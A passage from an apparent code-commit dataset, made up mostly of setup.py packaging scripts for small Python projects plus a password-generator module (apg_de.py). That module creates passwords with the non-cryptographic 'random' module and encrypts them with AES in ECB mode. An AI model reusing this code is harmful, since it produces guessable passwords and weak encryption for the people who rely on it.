install_requires=['markdown','BeautifulSoup', 'python-docx','lxml==3.4.2', 'cryptography==0.8.2', 'pyOpenSSL', 'requests', 'importlib','flask-bcrypt'],
dependency_links= [
'https://github.com/mitsuhiko/flask/tarball/master#egg=Flask-owasp'
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Flask",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Software Development",
"Topic :: Security",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
])
| agpl-3.0 | Python |
85a7279c08b1997b5d2483106a10a0c428d44458 | Add setup.py. | FelixLoether/python-sharer | setup.py | setup.py | from setuptools import setup, Command
import subprocess
# distutils Command: lets `python setup.py test` shell out to py.test and
# exit with its return code.
class PyTest(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
errno = subprocess.call(['py.test'])
raise SystemExit(errno)
# Packaging metadata; cmdclass wires the PyTest command defined above.
# NOTE(review): open('README.rst').read() leaves the file handle to the
# garbage collector -- harmless for a setup script, but a `with` would be
# cleaner.
setup(
name='python-sharer',
version='0.1.0',
url='http://github.com/FelixLoether/python-sharer',
author='Oskari Hiltunen',
author_email='python-sharer@loethr.net',
description=(
'Python-Sharer is a utility to help share a message to different '
'social medias.'
),
long_description=open('README.rst').read(),
packages=['sharers'],
platforms='any',
cmdclass={'test': PyTest},
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Internet :: WWW/HTTP',
]
)
| mit | Python | |
a45885947fa10c9143beec5294870e801fff8bc6 | Create apg_de.py | t3sl4/APGTool-gui | apg_de.py | apg_de.py | #!/usr/bin/env python2
#
#
#
# by t3sl4/tesl23
#
import base64
import random
import string
from Crypto.Cipher import AES
decoded = ''
def makepasswd(bsize, key, spass, username, passfor, saveto, pad, dec, low, upp, pun):
    """Generate a random password, AES-encrypt it and append it to a file.

    bsize -- AES block size as a *string* ('16', '24' or '32').
    key -- key handed to Crypto.Cipher.AES.new().
    spass -- which character class must come first: 'r' (no preference),
             'd' (digit), 'l' (lowercase), 'u' (uppercase), 'p' (punctuation).
    username/passfor -- labels stored alongside the encrypted password.
    saveto -- file the "<passfor>::<username>::<ciphertext>" record is
              appended to.
    pad -- single padding character used to pad up to the block size.
    dec/low/upp/pun -- how many digits/lowercase/uppercase/punctuation
                       characters to generate (int-convertible).
    """
    if bsize == '32':
        bsize = 32
    elif bsize == '16':
        bsize = 16
    elif bsize == '24':
        bsize = 24
    else:
        # TODO handle error properly: bsize is still a string here, so the
        # padding lambda below will raise a TypeError.
        print('Error 1')
    # Build the password from the requested number of characters of each
    # class, then shuffle so the classes are interleaved.
    passwd = ''
    for amount, pool in ((dec, string.digits),
                         (low, string.ascii_lowercase),
                         (upp, string.ascii_uppercase),
                         (pun, string.punctuation)):
        for _ in range(int(amount)):
            passwd += random.choice(pool)
    shuffled = list(passwd)
    random.shuffle(shuffled)
    passwd = ''.join(shuffled)
    # Optionally move the first character of the requested class to the
    # front.  (Fixed: these comparisons previously used `is`, which only
    # worked by accident of CPython string interning; `==` is correct.)
    char_classes = {
        'd': string.digits,
        'l': string.ascii_lowercase,
        'u': string.ascii_uppercase,
        'p': string.punctuation,
    }
    if spass == 'r':
        pass  # random order requested: keep the shuffle as-is
    elif spass in char_classes:
        wanted = char_classes[spass]
        chars = list(passwd)
        cnt = 0
        for ch in chars:
            if ch in wanted:
                break
            cnt += 1
        # NOTE(review): if no character of the requested class exists (its
        # count was 0) pop() raises IndexError, same as the original code.
        chars.insert(0, chars.pop(cnt))
        passwd = ''.join(chars)
    else:
        # TODO handle error
        print('')
        print('Wrong choice!')
    # Pad to a multiple of the block size, AES-encrypt, base64-encode and
    # append the record; `with` guarantees the file is closed.
    padd = lambda s: s + (bsize - len(s) % bsize) * pad
    encAES = lambda c, s: base64.b64encode(c.encrypt(padd(s)))
    cipher = AES.new(key)
    encoded = encAES(cipher, passwd)
    with open(saveto, 'a') as ofile:
        ofile.write(passfor + '::' + username + '::' + encoded + '\n')
def decryptpasswd(dkey, dpad, dpass):
# Reverse of makepasswd's encryption: base64-decode dpass, AES-decrypt it
# with dkey and strip the dpad padding.  The plaintext is published via
# the module-level global 'decoded' rather than returned.
global decoded
decAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(dpad)
cipher = AES.new(dkey)
decoded = decAES(cipher, dpass)
| cc0-1.0 | Python | |
77f6f387d2eda3accc2969a02daf5c8315016d6b | Fix #5: add setup.py for PyPI package | snowblink14/smatch | setup.py | setup.py | #!/usr/bin/env python
import sys
import os

try:
    from setuptools import setup, find_packages
except ImportError:
    # Fixed typo: this fallback previously imported "disutils.core", which
    # itself raised ImportError and defeated the purpose of the fallback.
    # (find_packages is unused and has no distutils equivalent.)
    from distutils.core import setup

here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md")) as f:
    README = f.read()

setup(name="smatch",
      version="1.0",
      description="Smatch (semantic match) tool",
      long_description=README,
      author="Shu Cai",
      author_email="shucai@isi.edu",
      url="https://github.com/snowblink14/smatch",
      license="MIT",
      py_modules=["smatch", "amr"],
      scripts=["smatch.py"],
      )
| mit | Python | |
c09aae8181fd7ab706b6fca84e64830e76007687 | add setup.py file | jesford/cluster-lensing | setup.py | setup.py | import os
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

DESCRIPTION = "Galaxy Cluster Properties and Weak Lensing Profiles"
LONG_DESCRIPTION = """
cluster-lensing: galaxy cluster halo calculations
======================================================
This package includes tools for calculating a variety of galaxy cluster properties, as well as mass-richness and mass-concentration scaling relations, and weak lensing profiles. These include surface mass density (Sigma) and differential surface mass density (DeltaSigma) for NFW halos, both with and without the effects of cluster miscentering.
For more information, visit http://github.com/jesford/cluster-lensing
"""
NAME = "cluster-lensing"
AUTHOR = "Jes Ford"
AUTHOR_EMAIL = "jesford@uw.edu"
MAINTAINER = "Jes Ford"
MAINTAINER_EMAIL = "jesford@uw.edu"
URL = 'http://github.com/jesford/cluster-lensing'
DOWNLOAD_URL = 'http://github.com/jesford/cluster-lensing'
LICENSE = 'MIT'
VERSION = '0.0.1'

setup(name=NAME,
      version=VERSION,
      description=DESCRIPTION,
      long_description=LONG_DESCRIPTION,
      author=AUTHOR,
      author_email=AUTHOR_EMAIL,
      maintainer=MAINTAINER,
      maintainer_email=MAINTAINER_EMAIL,
      url=URL,
      download_url=DOWNLOAD_URL,
      license=LICENSE,
      # NOTE(review): 'cluster-lensing' contains a hyphen, which is not an
      # importable package name -- confirm the real package directory name.
      packages=['cluster-lensing'],
      classifiers=[
          'Development Status :: 4 - Beta',
          'Environment :: Console',
          'Intended Audience :: Science/Research',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Programming Language :: Python :: 2.7',
      ],  # fixed: this closing bracket was missing, making the file a SyntaxError
      )
| mit | Python | |
b89347a6aaec2f5d74f788b966ead5cc8a2ae37e | add setup.py | vpelletier/python-libusb1,vpelletier/python-libusb1 | setup.py | setup.py | from distutils.core import setup
# Packaging metadata: ships the two modules listed in py_modules.
setup(name='python-libusb1',
description='a Python wrapper around libusb-1.0',
version='0.0.1',
author='vpelletier',
url='http://github.com/vpelletier/python-libusb1',
py_modules=['libusb1','usb1'],
)
| lgpl-2.1 | Python | |
e0550aa39f76eb186be41914afb484d135d0257c | Add setup.py | inean/LinkHeader | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup

setup(name='LinkHeader',
      version='0.1',
      description='The parsing and formatting of Link Headers',
      author='Michael Burrows',
      author_email='mjb@asplake.co.uk ',
      url='http://bitbucket.org/asplake/link_header',
      # Fixed: the comma after py_modules was missing, which made this
      # whole call a SyntaxError.
      py_modules=['link_header'],
      # NOTE(review): "Development Status :: TBC" is not a valid trove
      # classifier -- pick a real status before uploading to PyPI.
      classifiers=["Development Status :: TBC",
                   "Intended Audience :: Developers",
                   "License :: OSI Approved :: BSD License",
                   "Programming Language :: Python",
                   "Topic :: Internet :: WWW/HTTP",
                   "Topic :: Software Development :: Libraries :: Python Modules"])
| mit | Python | |
62facc7d99797330fbd03b55a88ba12c60c23ea2 | add setup.py | encorehu/django-home,encorehu/django-home,encorehu/django-home | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
# Packaging metadata: ships the 'home' package with its templates.
setup(
name='home',
version="0.1",
author='encorehu',
author_email='huyoo353@126.com',
description='a django project specific app.',
url='https://github.com/encorehu/django-home',
packages=find_packages(),
package_dir={'home':'home'},
package_data={'home':['*.*','templates/home/*.*']},
zip_safe = False,
include_package_data=True,
classifiers=[
"Framework :: Django",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Topic :: Software Development"
],
)
| mit | Python | |
56f1a366c8a482c63782933514222376bb827a8a | add setup.py | ldo/dbussy | setup.py | setup.py | #+
# Distutils script to install DBussy. Invoke from the command line
# in this directory as follows:
#
# python3 setup.py build
# sudo python3 setup.py install
#
# Written by Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
#-
import distutils.core
# Packaging metadata for the single-module dbussy distribution.
distutils.core.setup \
(
name = "DBussy",
version = "0.5",
description = "language bindings for libdbus, for Python 3.5 or later",
author = "Lawrence D'Oliveiro",
author_email = "ldo@geek-central.gen.nz",
url = "http://github.com/ldo/dbussy",
py_modules = ["dbussy"],
)
| lgpl-2.1 | Python | |
475458a322525f429b31fe54f1295685b2195c39 | Add setup.py | scolby33/address_extractor | setup.py | setup.py | """Setup module for the address_extractor package"""
import setuptools
import codecs # To use a consistent encoding
import os
import re
#################################################################
# Static packaging configuration; edit this section, not the setup() call.
PACKAGES = setuptools.find_packages(where='src')
# __init__.py of the package; find_meta() greps its __*__ dunders.
META_PATH = os.path.join('src', 'address_extractor', '__init__.py')
KEYWORDS = ['']
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'License :: Other/Proprietary License',
'Programming Language :: Python :: 3.5',
'Topic :: Office/Business'
]
INSTALL_REQUIRES = ['usaddress']
EXTRAS_REQUIRE = {}
CONSOLE_ENTRY_POINTS = ['address_extractor=address_extractor.__main__:main']
#################################################################
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
    """Build an absolute path from *parts* and return the contents of the resulting file. Assume UTF-8 encoding."""
    target = os.path.join(HERE, *parts)
    with codecs.open(target, 'rb', 'utf-8') as handle:
        return handle.read()
# Cached contents of the package __init__.py; find_meta() searches this.
META_FILE = read(META_PATH)
def find_meta(meta):
    """Extract __*meta*__ from META_FILE"""
    # Look for a line of the form  __<meta>__ = "value"  (or single quotes)
    # anywhere in the cached __init__.py text.
    pattern = r'^__{meta}__ = ["\']([^"\']*)["\']'.format(meta=meta)
    match = re.search(pattern, META_FILE, re.M)
    if not match:
        raise RuntimeError('Unable to find __{meta}__ string'.format(meta=meta))
    return match.group(1)
def get_long_description():
"""Get the long_description from the README.md file. Assume UTF-8 encoding."""
with codecs.open(os.path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
if __name__ == '__main__':
setuptools.setup(
name = find_meta('title'),
version = find_meta('version'),
description = find_meta('description'),
long_description = get_long_description(),
url = find_meta('url'),
author = find_meta('author'),
author_email = find_meta('email'),
maintainer = find_meta('author'),
license = find_meta('license'),
classifiers = CLASSIFIERS,
keywords = KEYWORDS,
packages = PACKAGES,
package_dir = {'': 'src'},
install_requires = INSTALL_REQUIRES,
extras_require = EXTRAS_REQUIRE,
entry_points = {
'console_scripts': CONSOLE_ENTRY_POINTS
}
)
| mit | Python | |
72af391ec00facfbabc8ac89ff3bea1b54799d97 | Add plot of days per year with precip | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | htdocs/plotting/auto/scripts/p50.py | htdocs/plotting/auto/scripts/p50.py | import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import psycopg2.extras
import pyiem.nws.vtec as vtec
from pyiem.network import Table as NetworkTable
import numpy as np
import pytz
PDICT = {
"hadgem=a1b": "HADGEM A1B",
"cnrm=a1b" : "CNRM A1B",
"echam5=a1b" : "ECHAM5 A1B",
"echo=a1b" : "ECHO A1B",
"pcm=a1b" : "PCM A1B",
"miroc_hi=a1b": "MIROC_HI A1B",
"cgcm3_t47=a1b": "CGCM3_T47 A1B",
"giss_aom=a1b": "GISS_AOM A1B",
"hadcm3=a1b": "HADCM3 A1B",
"cgcm3_t63=a1b": "CGCM3_T63 A1B",
}
def get_description():
""" Return a dict describing how to call this plotter """
d = dict()
d['cache'] = 86400
d['description'] = """ """
d['arguments'] = [
dict(type='networkselect', name='station', network='CSCAP',
default='ISUAG', label='Select CSCAP Site:'),
dict(type='select', name='model', default='echo=a1b',
label='Select Model:', options=PDICT)
]
return d
def plotter( fdict ):
""" Go """
pgconn = psycopg2.connect(database='coop', host='iemdb', user='nobody')
cursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
station = fdict.get('station', 'ISUAG')
nt = NetworkTable("CSCAP")
clstation = nt.sts[station]['climate_site']
(model, scenario) = fdict.get('model', 'hadgem=a1b').split("=")
(fig, ax) = plt.subplots(1, 1)
cursor.execute("""
SELECT extract(year from day) as yr, sum(case when precip > 0
THEN 1 else 0 end) from hayhoe_daily WHERE precip is not null and
station = %s and model = %s and scenario = %s
GROUP by yr ORDER by yr ASC
""", (clstation, model, scenario))
years = []
precip = []
for row in cursor:
years.append(row[0])
precip.append(row[1])
ax.bar(years, precip, ec='b', fc='b')
ax.grid(True)
ax.set_ylabel("Days Per Year")
ax.set_title("%s %s\n%s %s :: Days per Year with Measureable Precip" % (
station, nt.sts[station]['name'], model,
scenario))
return fig
| mit | Python | |
a950eb82f62f98900db8dcc4f30fd444f760b6e0 | Bump for 1.9.9-04 | bopo/cookiecutter-django,schacki/cookiecutter-django,mistalaba/cookiecutter-django,hairychris/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,ad-m/cookiecutter-django,asyncee/cookiecutter-django,hackebrot/cookiecutter-django,trungdong/cookiecutter-django,luzfcb/cookiecutter-django,hackebrot/cookiecutter-django,ryankanno/cookiecutter-django,topwebmaster/cookiecutter-django,ryankanno/cookiecutter-django,topwebmaster/cookiecutter-django,schacki/cookiecutter-django,Parbhat/cookiecutter-django-foundation,asyncee/cookiecutter-django,pydanny/cookiecutter-django,Parbhat/cookiecutter-django-foundation,pydanny/cookiecutter-django,webyneter/cookiecutter-django,mistalaba/cookiecutter-django,webspired/cookiecutter-django,ddiazpinto/cookiecutter-django,webyneter/cookiecutter-django,webyneter/cookiecutter-django,bopo/cookiecutter-django,trungdong/cookiecutter-django,hairychris/cookiecutter-django,mistalaba/cookiecutter-django,aleprovencio/cookiecutter-django,asyncee/cookiecutter-django,hairychris/cookiecutter-django,bopo/cookiecutter-django,hackebrot/cookiecutter-django,hackebrot/cookiecutter-django,ddiazpinto/cookiecutter-django,luzfcb/cookiecutter-django,thisjustin/cookiecutter-django,topwebmaster/cookiecutter-django,ryankanno/cookiecutter-django,aleprovencio/cookiecutter-django,ad-m/cookiecutter-django,thisjustin/cookiecutter-django,schacki/cookiecutter-django,webspired/cookiecutter-django,bopo/cookiecutter-django,luzfcb/cookiecutter-django,asyncee/cookiecutter-django,Parbhat/cookiecutter-django-foundation,gappsexperts/cookiecutter-django,trungdong/cookiecutter-django,webspired/cookiecutter-django,aleprovencio/cookiecutter-django,gappsexperts/cookiecutter-django,pydanny/cookiecutter-django,mistalaba/cookiecutter-django,ddiazpinto/cookiecutter-django,Parbhat/cookiecutter-django-foundation,ddiazpinto/cookiecutter-django,ad-m/cookiecutter-django,webspired/cookiecutter-django,hairychris/co
okiecutter-django,gappsexperts/cookiecutter-django,gappsexperts/cookiecutter-django,aleprovencio/cookiecutter-django,schacki/cookiecutter-django,ad-m/cookiecutter-django,ryankanno/cookiecutter-django,trungdong/cookiecutter-django,luzfcb/cookiecutter-django,topwebmaster/cookiecutter-django,thisjustin/cookiecutter-django,webyneter/cookiecutter-django | setup.py | setup.py | #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Our version ALWAYS matches the version of Django we support
# If Django has a new release, we branch, tag, then update this setting after the tag.
version = '1.9.9-04'
if sys.argv[-1] == 'tag':
os.system('git tag -a %s -m "version %s"' % (version, version))
os.system('git push --tags')
sys.exit()
with open('README.rst') as readme_file:
long_description = readme_file.read()
setup(
name='cookiecutter-django',
version=version,
description='A Cookiecutter template for creating production-ready Django projects quickly.',
long_description=long_description,
author='Daniel Roy Greenfeld',
author_email='pydanny@gmail.com',
url='https://github.com/pydanny/cookiecutter-django',
packages=[],
license='BSD',
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Software Development',
],
keywords=(
'cookiecutter, Python, projects, project templates, django, '
'skeleton, scaffolding, project directory, setup.py'
),
)
| #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Our version ALWAYS matches the version of Django we support
# If Django has a new release, we branch, tag, then update this setting after the tag.
version = '1.9.9-03'
if sys.argv[-1] == 'tag':
os.system('git tag -a %s -m "version %s"' % (version, version))
os.system('git push --tags')
sys.exit()
with open('README.rst') as readme_file:
long_description = readme_file.read()
setup(
name='cookiecutter-django',
version=version,
description='A Cookiecutter template for creating production-ready Django projects quickly.',
long_description=long_description,
author='Daniel Roy Greenfeld',
author_email='pydanny@gmail.com',
url='https://github.com/pydanny/cookiecutter-django',
packages=[],
license='BSD',
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Software Development',
],
keywords=(
'cookiecutter, Python, projects, project templates, django, '
'skeleton, scaffolding, project directory, setup.py'
),
)
| bsd-3-clause | Python |
1d693c0e32cb3247e861c819d389f51fc2fc6be0 | add setup.py | encorehu/webqq | setup.py | setup.py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from setuptools import setup, find_packages
setup(
name = "webqq",
version="0.1.0",
packages = find_packages(),
zip_safe = False,
description = "python 2.7.x webqq lib, for fun.",
long_description = "python 2.7.x webqq lib, for fun.",
author = "encorehu",
author_email = "huyoo353@126.com",
license = "MIT",
keywords = ("webqq", "egg"),
platforms = "all",
url = "https://github.com/encorehu/webqq",
)
| mit | Python | |
e3c32fb0775a17d47906c5fdd48a9809a00430b3 | include kismon.windows in the setup.py | krzotr/kismon,Kismon/kismon,vaginessa/kismon | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='kismon',
version='0.2',
description='PyGTK based kismet client',
author='Patrick Salecker',
author_email='mail@salecker.org',
url='http://www.salecker.org/software/kismon/en',
license='BSD',
packages=['kismon', 'kismon.windows'],
scripts=['bin/kismon'],
platforms='UNIX',
data_files = [('/usr/share/applications', ['files/kismon.desktop']),
('/usr/share/kismon',
['files/position.png',
'files/minimal-rules.xml', 'files/night-rules.xml']),
],
)
| #!/usr/bin/env python
from distutils.core import setup
setup(name='kismon',
version='0.2',
description='PyGTK based kismet client',
author='Patrick Salecker',
author_email='mail@salecker.org',
url='http://www.salecker.org/software/kismon/en',
license='BSD',
packages=['kismon'],
scripts=['bin/kismon'],
platforms='UNIX',
data_files = [('/usr/share/applications', ['files/kismon.desktop']),
('/usr/share/kismon',
['files/position.png',
'files/minimal-rules.xml', 'files/night-rules.xml']),
],
)
| bsd-3-clause | Python |
392458f6d5cea3d723d86d6238d1f1b46cfc95a5 | Add a setup.py | zain/jogging | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='jogging',
version='0.1',
description='Jogging makes logging in django easier',
author='Zain',
author_email='zain@inzain.net',
url='',
packages = ['jogging',],
package_dir = {'jogging':'jogging'},
)
| mit | Python | |
e67e2ca56310c35a0a8bb30ecb9fceeb55dcc9f5 | Add setup.py | tiwilliam/sverigesradio | setup.py | setup.py | # -*- coding: utf8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
version='0.3',
name='sverigesradio',
description='Python bindings for Sveriges Radio API',
author='William Tisäter',
author_email='william@defunct.cc',
packages=['sverigesradio'],
install_requires=['requests >= 2.1.0'],
url='https://github.com/tiwilliam/sverigesradio',
classifiers=['Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3'],
license='MIT License',
keywords='sr sverigesradio'
)
| mit | Python | |
ec087b033b8e9b4172a4d5e77a26a10ea16ffb64 | Add setup.py | LuqueDaniel/pybooru,buzzbyte/pybooru,LuqueDaniel/pybooru,buzzbyte/pybooru | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
from setuptools import find_packages
__author__ = 'Daniel Luque <danielluque14@gmail.com>'
__version__ = '1.0.0'
setup(
name='pybooru',
version=__version__,
    author=__author__,
author_email="danielluque14@gmail.com",
url="http://mundogeek.net/tutorial-python/",
license="GPL",
packages=find_packages(),
include_package_data=True,
install_requires=['simplejson'],
) | mit | Python | |
072d6a2ad1ab293427aadd074c5485483f701eb1 | Add a setuptools wrapper | smarkets/statprof,bos/statprof.py | setup.py | setup.py | #!/usr/bin/env python
import os
from setuptools import find_packages, setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "statprof",
version = "0.1",
author = "Jeff Muizelaar",
author_email = "jmuizelaar@mozilla.com",
description = ("Statistical profiling for Python"),
license = "LGPL",
keywords = "profiling",
url = "http://packages.python.org/statprof",
py_modules = ['statprof'],
long_description = read('README'),
classifiers = [
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: LGPL License",
],
)
| lgpl-2.1 | Python | |
8500effa4ade8ecb3eff0501a749a869467a8768 | Add setup.py | omf2097/pyomftools,omf2097/pyomftools | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(
name='OMFTools',
version='0.1',
description='Tools for modifying OMF2097 files',
author='Tuomas Virtanen',
author_email='katajakasa@gmail.com',
url='https://github.com/omf2097/pyomftools',
packages=['omftools', 'omftools.pyshadowdive'],
)
| mit | Python | |
7b8f76d53fb820e4fd429f880557bf52ec5dc4be | Add setup | Rhathe/fixtureupper | setup.py | setup.py | from setuptools import setup
setup(
name='fixture-generator',
version='0.0.1',
packages=['fixture-generator'],
url='https://github.com/Rhathe/Fixture-Generator',
license='MIT',
author='Ramon Sandoval',
description='SqlAlchemy Fixture Generator',
long_description='SqlAlchemy Fixture Generator',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Utilities',
],
install_requires=[
],
)
| mit | Python | |
12dce1474946d1a9bc41681af6dc2723ecfcc7f1 | Add setup.py | carlcarl/grabflickr | setup.py | setup.py | from setuptools import setup
from setuptools import find_packages
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='downflickr',
description='Download photoset of flickr using gevent',
long_description=open('README.rst').read(),
version='0.0.1',
author='carlcarl',
author_email='carlcarlking@gmail.com',
url='https://github.com/carlcarl/downflickr',
packages=find_packages(),
install_requires=required,
license='MIT',
entry_points={
'console_scripts': [
'downflickr = downflickr.downflickr:main',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: Unix',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries',
]
)
| mit | Python | |
3cd157c12224ba8cee54be36f7da92f30c38964f | Update issue 120 Moving parsers and serializer implementations into rdflib.plugins package | yingerj/rdflib,yingerj/rdflib,avorio/rdflib,marma/rdflib,dbs/rdflib,marma/rdflib,marma/rdflib,RDFLib/rdflib,RDFLib/rdflib,dbs/rdflib,avorio/rdflib,RDFLib/rdflib,avorio/rdflib,marma/rdflib,RDFLib/rdflib,armandobs14/rdflib,yingerj/rdflib,ssssam/rdflib,ssssam/rdflib,ssssam/rdflib,armandobs14/rdflib,dbs/rdflib,avorio/rdflib,dbs/rdflib,armandobs14/rdflib,armandobs14/rdflib,yingerj/rdflib,ssssam/rdflib | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
# Install rdflib
from rdflib import __version__
setup(
name = 'rdflib',
version = __version__,
description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.",
author = "Daniel 'eikeon' Krech",
author_email = "eikeon@eikeon.com",
maintainer = "Daniel 'eikeon' Krech",
maintainer_email = "eikeon@eikeon.com",
url = "http://rdflib.net/",
license = "http://rdflib.net/latest/LICENSE",
platforms = ["any"],
classifiers = ["Programming Language :: Python",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description = \
"""RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX and RDFa . The library presents a Graph
interface which can be backed by any one of a number of Store
implementations, including, Memory, MySQL, Redland, SQLite,
Sleepycat and SQLObject.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
http://rdflib.googlecode.com/svn/trunk#egg=rdflib-dev
""",
download_url = "http://rdflib.net/rdflib-%s.tar.gz" % __version__,
packages = ['rdflib',
'rdflib/plugins',
'rdflib/plugins',
'rdflib/plugins/parsers',
'rdflib/plugins/parsers/rdfa',
'rdflib/plugins/parsers/rdfa/transform',
'rdflib/plugins/serializers',
],
)
| #!/usr/bin/env python
from distutils.core import setup
# Install rdflib
from rdflib import __version__
setup(
name = 'rdflib',
version = __version__,
description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.",
author = "Daniel 'eikeon' Krech",
author_email = "eikeon@eikeon.com",
maintainer = "Daniel 'eikeon' Krech",
maintainer_email = "eikeon@eikeon.com",
url = "http://rdflib.net/",
license = "http://rdflib.net/latest/LICENSE",
platforms = ["any"],
classifiers = ["Programming Language :: Python",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description = \
"""RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX and RDFa . The library presents a Graph
interface which can be backed by any one of a number of Store
implementations, including, Memory, MySQL, Redland, SQLite,
Sleepycat and SQLObject.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
http://rdflib.googlecode.com/svn/trunk#egg=rdflib-dev
""",
download_url = "http://rdflib.net/rdflib-%s.tar.gz" % __version__,
packages = ['rdflib',
'rdflib/plugins',
'rdflib/syntax',
'rdflib/syntax/parsers',
'rdflib/syntax/parsers/rdfa',
'rdflib/syntax/parsers/rdfa/transform',
'rdflib/syntax/serializers',
],
)
| bsd-3-clause | Python |
43947b54e8774306ead2fa86ef587526f058e572 | Add manage.py for quick access to management commands | zostera/django-modeltrans,zostera/django-modeltrans | manage.py | manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.app.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| bsd-3-clause | Python | |
23f797bcf30bb7de26d1558e5eafc7818141f640 | Create __init__.py | marcoikeda/attribution_model | attribution/__init__.py | attribution/__init__.py | mit | Python | ||
34530a8b60bc1ebfe9bdd56250ecf23e05b8c935 | add setup.py | OpenTouch/vsphere-client | setup.py | setup.py | #!/usr/bin/env python2.7
from setuptools import setup
long_description = """\
vSphere Client for Python is pure-Python implementation of
collection tools to access to VMware's vSphere API.
It provides both a Python API and a CLI to manage vSphere.
"""
pkgdir = {'': 'src'}
setup(
name = 'vsphere',
version = '1.0.0',
description = 'vsphere-cli: VMware vSphere API and CLI management tool',
keywords = 'vmware api vsphere cli admin tool',
long_description = long_description,
author = 'Alcatel-Lucent Enterprise Personal Cloud R&D',
author_email = 'dev@opentouch.net',
url = 'https://github.com/OpenTouch/vsphere-client',
package_dir=pkgdir,
packages=['vsphere'],
include_package_data=True,
scripts=['bin/vsphere'],
